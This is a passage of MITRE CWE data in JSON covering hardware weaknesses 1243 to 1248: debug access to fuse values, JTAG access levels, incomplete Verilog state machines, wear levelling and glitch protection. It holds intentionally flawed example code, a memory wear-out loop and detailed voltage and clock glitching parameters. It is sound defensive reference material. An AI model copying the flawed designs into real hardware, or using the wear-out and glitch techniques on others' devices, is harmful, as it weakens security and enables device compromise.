exploit these interfaces for unauthorized access."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Documentation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":"The implementation of chicken bits in a released product is highly discouraged. If implemented at all, ensure that they are disabled in production devices. All interfaces to a device should be documented."},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider a device that comes with various security measures, such as secure boot. The secure-boot process performs firmware-integrity verification at boot time, and this code is stored in a separate SPI-flash device. However, this code contains undocumented \\"special access features\\" intended to be used only for performing failure analysis and intended to only be unlocked by the device designer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":"Attackers dump the code from the device and then perform reverse engineering to analyze the code. The undocumented, special-access features are identified, and attackers can activate them by sending specific commands via UART before secure-boot phase completes. Using these hidden features, attackers can perform reads and writes to memory via the UART interface. At runtime, the attackers can also execute arbitrary code and dump the entire memory contents."},"Body_Text":"Remove all chicken bits and hidden features that are exposed to attackers. Add authorization schemes that rely on cryptographic primitives to access any features that the manufacturer does not want to expose. Clearly document all interfaces."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"212"}},{"attr":{"@_CAPEC_ID":"36"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1071"}},{"attr":{"@_External_Reference_ID":"REF-1072"}},{"attr":{"@_External_Reference_ID":"REF-1073"}},{"attr":{"@_External_Reference_ID":"REF-1074"}},{"attr":{"@_External_Reference_ID":"REF-1075"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-13"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Potential_Mitigations, Related_Attack_Patterns"}}},"1243":{"attr":{"@_ID":"1243","@_Name":"Sensitive Non-Volatile Information Not Protected During Debug","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Access to security-sensitive information stored in fuses is not limited during debug.","Extended_Description":{"xhtml:p":"Several security-sensitive values are programmed into fuses to be used during early-boot flows or later at runtime. Examples of these security-sensitive values include root keys, encryption keys, manufacturing-specific information, chip-manufacturer-specific information, and original-equipment-manufacturer (OEM) data. After the chip is powered on, these values are sensed from fuses and stored in temporary locations such as registers and local memories. These locations are typically access-control protected from untrusted agents capable of accessing them. Even to trusted agents, only read-access is provided. However, these locations are not blocked during debug operations, allowing a user to access this sensitive information."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1263","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Modify Memory","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":"Disable access to security-sensitive information stored in fuses directly and also reflected from temporary storage locations when in debug mode."}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Sensitive manufacturing data (such as die information) are stored in fuses. When the chip powers on, these values are read from the fuses and stored in microarchitectural registers. These registers are only given read access to trusted software running on the core. Untrusted software running on the core is not allowed to access these registers.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":"All microarchitectural registers in this chip can be accessed through the debug interface. As a result, even an untrusted debugger can access this data and retrieve sensitive manufacturing data."},{"attr":{"@_Nature":"informative"},"xhtml:div":"Registers used to store sensitive values read from fuses should be blocked during debug. These registers should be disconnected from the debug interface."}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"116"}},{"attr":{"@_CAPEC_ID":"545"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Exposure of Security-Sensitive Fuse Values During Debug","attr":{"@_Date":"2020-08-20"}}}},"1244":{"attr":{"@_ID":"1244","@_Name":"Internal Asset Exposed to Unsafe Debug Access Level or State","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product uses physical debug or test\\n interfaces with support for multiple access levels, but it\\n assigns the wrong debug access level to an internal asset,\\n providing unintended access to the asset from untrusted debug\\n agents.","Extended_Description":{"xhtml:p":["Debug authorization can have multiple levels of\\n\\t access, defined such that different system internal assets\\n\\t are accessible based on the current authorized debug\\n\\t level. Other than debugger authentication (e.g., using\\n\\t passwords or challenges), the authorization can also be\\n\\t based on the system state or boot stage. For example, full\\n\\t system debug access might only be allowed early in boot\\n\\t after a system reset to ensure that previous session data is\\n\\t not accessible to the authenticated debugger.","If this protection mechanism does not ensure that\\n internal assets have the correct debug access level during\\n each boot stage or change in system state, an attacker could\\n obtain sensitive information from the internal asset using a\\n debugger."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"863","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory"},{"Scope":"Integrity","Impact":"Modify Memory"},{"Scope":["Authorization","Access Control"],"Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}]},"Detection_Methods":{"Detection_Method":{"Method":"Manual Analysis","Description":"Check 2 devices for their passcode to authenticate access to JTAG/debugging ports. If the passcodes are missing or the same, update the design to fix and retest. Check communications over JTAG/debugging ports for encryption. If the communications are not encrypted, fix the design and retest.","Effectiveness":"Moderate"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":"For security-sensitive assets accessible over debug/test interfaces, only allow trusted agents."},"Effectiveness":"High"},{"Phase":"Architecture and Design","Description":"Apply blinding [REF-1219] or masking techniques in strategic areas.","Effectiveness":"Limited"},{"Phase":"Implementation","Description":"Add shielding or tamper-resistant protections to the device, which increases the difficulty and cost for accessing debug/test interfaces.","Effectiveness":"Limited"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The JTAG interface is used to perform debugging and provide CPU core access for developers. JTAG-access protection is implemented as part of the JTAG_SHIELD bit in the hw_digctl_ctrl register. This register has no default value at power up and is set only after the system boots from ROM and control is transferred to the user software.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:table":{"xhtml:tbody":{"xhtml:tr":[{"xhtml:td":["1 bit","0x0 = JTAG debugger is enabled (default)"]},{"xhtml:td":["JTAG_SHIELD","0x1 = JTAG debugger is disabled"]}]}}},{"attr":{"@_Nature":"informative"},"xhtml:div":"The default value of this register bit should be set to 1 to prevent the JTAG from being enabled at system reset."}],"Body_Text":"This means that since the end user has access to JTAG at system reset and during ROM code execution before control is transferred to user software, a JTAG user can modify the boot flow and subsequently disclose all CPU information, including data-encryption keys."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-18827","Description":"After ROM code execution, JTAG access is disabled. But before the ROM code is executed, JTAG access is possible, allowing a user full system access. This allows a user to modify the boot flow and successfully bypass the secure-boot process.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18827"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"114"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1056"}},{"attr":{"@_External_Reference_ID":"REF-1057"}},{"attr":{"@_External_Reference_ID":"REF-1219"}}]},"Notes":{"Note":{"#text":"CWE-1191 and CWE-1244 both involve physical debug access,\\n\\t but the weaknesses are different. CWE-1191 is effectively\\n\\t about missing authorization for a debug interface,\\n\\t i.e. JTAG. CWE-1244 is about providing internal assets with\\n\\t the wrong debug access level, exposing the asset to\\n\\t untrusted debug agents.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Name, Observed_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Hareesh Khattri","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-22","Contribution_Comment":"clarified differences between CWE-1191 and CWE-1244, and suggested rephrasing of descriptions and names."},"Previous_Entry_Name":{"#text":"Improper Authorization on Physical Debug and Test Interfaces","attr":{"@_Date":"2020-08-20"}}}},"1245":{"attr":{"@_ID":"1245","@_Name":"Improper Finite State Machines (FSMs) in Hardware Logic","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Faulty finite state machines (FSMs) in the hardware logic allow an attacker to put the system in an undefined state, to cause a denial of service (DoS) or gain privileges on the victim\'s system.","Extended_Description":{"xhtml:p":"The functionality and security of the system heavily depend on the implementation of FSMs. FSMs can be used to indicate the current security state of the system. Lots of secure data operations and data transfers rely on the state reported by the FSM. Faulty FSM designs that do not account for all states, either through undefined states (left as don\'t cares) or through incorrect implementation, might lead an attacker to drive the system into an unstable state from which the system cannot recover without a reset, thus causing a DoS. Depending on what the FSM is used for, an attacker might also gain additional privileges to launch further attacks and compromise the security guarantees."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"684","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Availability","Access Control"],"Impact":["Unexpected State","DoS: Crash, Exit, or Restart","DoS: Instability","Gain Privileges or Assume Identity"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Define all possible states and handle all unused states through default statements. Ensure that system defaults to a secure state.","Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The FSM shown in the \\"bad\\" code snippet below assigns the output out based on the value of state, which is determined based on the user provided input, user_input.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:div":{"#text":"module fsm_1(out, user_input, clk, rst_n);input [2:0] user_input;input clk, rst_n;output reg [2:0] out;reg [1:0] state;always @ (posedge clk or negedge rst_n )endmodule","xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"beginendout <= {1\'h1, state};","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"if (!rst_n)state = 3\'h0;elsecase (user_input)endcase","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"3\'h0:3\'h1:3\'h2:3\'h3: state = 2\'h3;3\'h4: state = 2\'h2;3\'h5: state = 2\'h1;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]}}}}},{"attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:div":{"#text":"case (user_input)endcase","xhtml:br":["",""],"xhtml:div":{"#text":"3\'h0:3\'h1:3\'h2:3\'h3: state = 2\'h3;3\'h4: state = 2\'h2;3\'h5: state = 2\'h1;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""],"xhtml:b":"default: state = 2\'h0;"}}}],"Body_Text":{"xhtml:p":["The case statement does not handle the scenario when user provides inputs of 3\'h6 and 3\'h7 using a default statement. Those inputs push the system to an undefined state and might cause a crash (denial of service) or any other unanticipated outcome.","Adding a default statement to handle undefined inputs mitigates this issue. This is shown in the \\"Good\\" code snippet below. The default statement is in bold."]}}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"74"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1060"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"The Intel Corporation","Submission_Date":"2020-02-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1246":{"attr":{"@_ID":"1246","@_Name":"Improper Write Handling in Limited-write Non-Volatile Memories","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product does not implement or incorrectly implements wear leveling operations in limited-write non-volatile memories.","Extended_Description":{"xhtml:p":"Non-volatile memories such as NAND Flash, EEPROM, etc. have individually erasable segments, each of which can be put through a limited number of program/erase or write cycles. For example, the device can only endure a limited number of writes, after which the device becomes unreliable. In order to wear out the cells in a uniform manner, non-volatile memory and storage products based on the above-mentioned technologies implement a technique called wear leveling. Once a set threshold is reached, wear leveling maps writes of a logical block to a different physical block. This prevents a single physical block from prematurely failing due to a high concentration of writes. If wear leveling is improperly implemented, attackers may be able to programmatically cause the storage to become unreliable within a much shorter time than would normally be expected."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Memory IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Storage IP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Instability"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation","Testing"],"Description":"Include secure wear leveling algorithms and ensure they may not be bypassed.","Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"An attacker can render a memory line unusable by repeatedly causing a write to the memory line.","Body_Text":["Below is example code from [REF-1058] that the user can execute repeatedly to cause line failure. W is the maximum associativity of any cache in the system; S is the size of the largest cache in the system.","Without wear leveling, the above attack will be successful. Simple randomization of blocks will not suffice as instead of the original physical block, the randomized physical block will be worn out."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":{"#text":"Do aligned alloc of (W+1) arrays each of size S}","xhtml:br":"","xhtml:div":{"#text":"while(1) {","xhtml:br":"","xhtml:div":{"#text":"for (ii = 0; i < W + 1; ii++)","xhtml:div":{"#text":"array[ii].element[0]++;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}},{"attr":{"@_Nature":"informative"},"xhtml:div":"Wear leveling must be used to even out writes to the device."}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"212"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1058"}},{"attr":{"@_External_Reference_ID":"REF-1059"}}]},"Notes":{"Note":{"#text":"The Technology-Class should be Memory.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-10"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Potential_Mitigations, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1247":{"attr":{"@_ID":"1247","@_Name":"Improper Protection Against Voltage and Clock Glitches","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The device does not contain or contains incorrectly implemented circuitry or sensors to detect and mitigate voltage and clock glitches and protect sensitive information or software contained on the device.","Extended_Description":{"xhtml:p":"A device might support features such as secure boot which are supplemented with hardware and firmware support. This involves establishing a chain of trust, starting with an immutable root of trust by checking the signature of the next stage (culminating with the OS and runtime software) against a golden value before transferring control. The intermediate stages typically set up the system in a secure state by configuring several access control settings. Similarly, security logic for exercising a debug or testing interface may be implemented in hardware, firmware, or both. A device needs to guard against fault attacks such as voltage glitches and clock glitches that an attacker may employ in an attempt to compromise the system."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Power Management IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Clock/Counter IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Sensor IP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism","Read Memory","Modify Memory","Execute Unauthorized Code or Commands"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":{"xhtml:p":["Put the processor in an infinite\\n\\t\\t\\tloop, which is then followed by instructions\\n\\t\\t\\tthat should not ever be executed, since the\\n\\t\\t\\tloop is not expected to exit. After the loop,\\n\\t\\t\\ttoggle an I/O bit (for oscilloscope monitoring\\n\\t\\t\\tpurposes), print a console message, and\\n\\t\\t\\treenter the loop. Note that to ensure that\\n\\t\\t\\tthe loop exit is actually captured, many NOP\\n\\t\\t\\tinstructions should be coded after the loop\\n\\t\\t\\tbranch instruction and before the I/O bit\\n\\t\\t\\ttoggle and the print statement.","Margining the clock consists of varying the clock\\n\\t\\t\\tfrequency until an anomaly occurs. This could be a\\n\\t\\t\\tcontinuous frequency change or it could be a single\\n\\t\\t\\tcycle. The single cycle method is described here. For\\n\\t\\t\\tevery 1000th clock pulse, the clock cycle is shortened by\\n\\t\\t\\t10 percent. If no effect is observed, the width is\\n\\t\\t\\tshortened by 20%. This process is continued in 10%\\n\\t\\t\\tincrements up to and including 50%. Note that the cycle\\n\\t\\t\\ttime may be increased as well, down to seconds per\\n\\t\\t\\tcycle.","Separately, the voltage is margined. Note that\\n\\t\\t\\tthe voltage could be increased or decreased. Increasing\\n\\t\\t\\tthe voltage has limits, as the circuitry may not be able\\n\\t\\t\\tto withstand a drastically increased voltage. This process\\n\\t\\t\\tstarts with a 5% reduction of the DC supply to the CPU\\n\\t\\t\\tchip for 5 millisecond repeated at 1KHz. If this has no\\n\\t\\t\\teffect, the process is repeated, but a 10% reduction is\\n\\t\\t\\tused. This process is repeated at 10% increments down to a\\n\\t\\t\\t50% reduction. If no effects are observed at 5\\n\\t\\t\\tmillisecond, the whole process is repeated using a 10\\n\\t\\t\\tmillisecond pulse. If no effects are observed, the process\\n\\t\\t\\tis repeated in 10 millisecond increments out to 100\\n\\t\\t\\tmillisecond pulses.","While these are suggested starting points for\\n\\t\\t\\ttesting circuitry for weaknesses, the limits may need to\\n\\t\\t\\tbe pushed further at the risk of device damage. See\\n\\t\\t\\t[REF-1217] for descriptions of Smart Card attacks against\\n\\t\\t\\ta clock (section 14.6.2) and using a voltage glitch\\n\\t\\t\\t(section 15.5.3)."]},"Effectiveness":"Moderate"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":"During the implementation phase where actual hardware is available, specialized hardware tools and apparatus such as ChipWhisperer may be used to check if the platform is indeed susceptible to voltage and clock glitching attacks."},{"Method":"Architecture or Design Review","Description":"Review if the protections against glitching merely transfer the attack target. For example, suppose a critical authentication routine that an attacker would want to bypass is given the protection of modifying certain artifacts from within that specific routine (so that if the routine is bypassed, one can examine the artifacts and figure out that an attack must have happened). However, if the attacker has the ability to bypass the critical authentication routine, they might also have the ability to bypass the other protection routine that checks the artifacts. Basically, depending on these kind of protections is akin to resorting to \\"Security by Obscurity\\"."},{"Method":"Architecture or Design Review","Description":"Many SoCs come equipped with a built-in Dynamic Voltage and Frequency Scaling (DVFS) that can control the voltage and clocks via software alone. However, there have been demonstrated attacks (like Plundervolt and CLKSCREW) that target this DVFS [REF-1081] [REF-1082]. During the design and implementation phases, one needs to check if the interface to this power management feature is available from unprivileged SW (CWE-1256), which would make the attack very easy."}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":"At the circuit-level, using Tunable Replica Circuits (TRCs) or special flip-flops such as Razor flip-flops helps mitigate glitch attacks. Working at the SoC or platform base, level sensors may be implemented to detect glitches. Implementing redundancy in security-sensitive code (e.g., where checks are performed)also can help with mitigation of glitch attacks."}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Below is a representative snippet of C code that is part of the secure-boot flow. A signature of the runtime-firmware image is calculated and compared against a golden value. If the signatures match, the bootloader loads runtime firmware. If there is no match, an error halt occurs. If the underlying hardware executing this code does not contain any circuitry or sensors to detect voltage or clock glitches, an attacker might launch a fault-injection attack right when the signature check is happening (at the location marked with the comment), causing a bypass of the signature-checking process.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:p":["...","if (signature_matches) // <-Glitch Here","{",{"#text":"load_runtime_firmware();","attr":{"@_style":"text-indent: 15px;"}},"}","else","{",{"#text":"do_not_load_runtime_firmware();","attr":{"@_style":"text-indent: 15px;"}},"}","..."],"xhtml:br":["",""]},{"attr":{"@_Nature":"informative"},"xhtml:div":"If the underlying hardware detects a voltage or clock glitch, the information can be used to prevent the glitch from being successful."}],"Body_Text":"After bypassing secure boot, an attacker can gain access to system assets to which the attacker should not have access."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-17391","Description":"Lack of anti-glitch protections allows an attacker to launch a physical attack to bypass the secure boot and read protected eFuses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17391"}},"Functional_Areas":{"Functional_Area":["Power","Clock"]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"624"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1061"}},{"attr":{"@_External_Reference_ID":"REF-1062"}},{"attr":{"@_External_Reference_ID":"REF-1063"}},{"attr":{"@_External_Reference_ID":"REF-1064"}},{"attr":{"@_External_Reference_ID":"REF-1065"}},{"attr":{"@_External_Reference_ID":"REF-1066"}},{"attr":{"@_External_Reference_ID":"REF-1217","@_Section":"14.6.2 Security Evolution, page 291"}},{"attr":{"@_External_Reference_ID":"REF-1217","@_Section":"15.5.3 Glitching, page 317"}},{"attr":{"@_External_Reference_ID":"REF-1081"}},{"attr":{"@_External_Reference_ID":"REF-1082"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Observed_Examples, Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Functional_Areas"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Parbati K. Manna","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-18","Contribution_Comment":"provided detection methods"},"Previous_Entry_Name":{"#text":"Missing Protection Against Voltage and Clock Glitches","attr":{"@_Date":"2020-08-20"}}}},"1248":{"attr":{"@_ID":"1248","@_Name":"Semiconductor Defects in Hardware Logic with Security-Sensitive Implications","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The security-sensitive hardware module contains semiconductor defects.","Extended_Description":{"xhtml:p":"A semiconductor device can fail for various reasons. While some are manufacturing and packaging defects, the rest are due to prolonged use or usage under extreme conditions. Some mechanisms that lead to semiconductor defects include encapsulation failure, die-attach failure, wire-bond failure, bulk-silicon defects, oxide-layer faults, aluminum-metal faults (including electromigration, corrosion of aluminum, etc.), and thermal/electrical stress. These defects manifest as faults on chip-internal signals or registers, have the effect of inputs, outputs, or intermediate signals being always 0 or always 1, and do not switch as expected. If such faults occur in security-sensitive hardware modules, security guarantees offered by the device will be compromised."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Manufacturing","Note":"May be introduced due to issues in the manufacturing environment or improper handling of components, for example."},{"Phase":"Operation","Note":"May be introduced by improper handling or usage outside of rated operating environments (temperature, humidity, etc.)"}]},"Common_Consequences":{"Consequence":{"Scope":["Availability","Access Control"],"Impact":"DoS: Instability"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Testing","Description":{"xhtml:p":"While semiconductor-manufacturing companies implement several mechanisms to continuously improve the semiconductor manufacturing process to ensure reduction of defects, some defects can only be fixed after manufacturing. Post-manufacturing testing of silicon die is critical. Fault models such as stuck-at-0 or stuck-at-1 must be used to develop post-manufacturing test cases and achieve good coverage. Once the silicon packaging is done, extensive post-silicon testing must be performed to ensure that hardware logic implementing security functionalities is defect-free."}},{"Phase":"Operation","Description":{"xhtml:p":"Operating the hardware outside device specification, such as at extremely high temperatures, voltage, etc., accelerates semiconductor degradation and results in 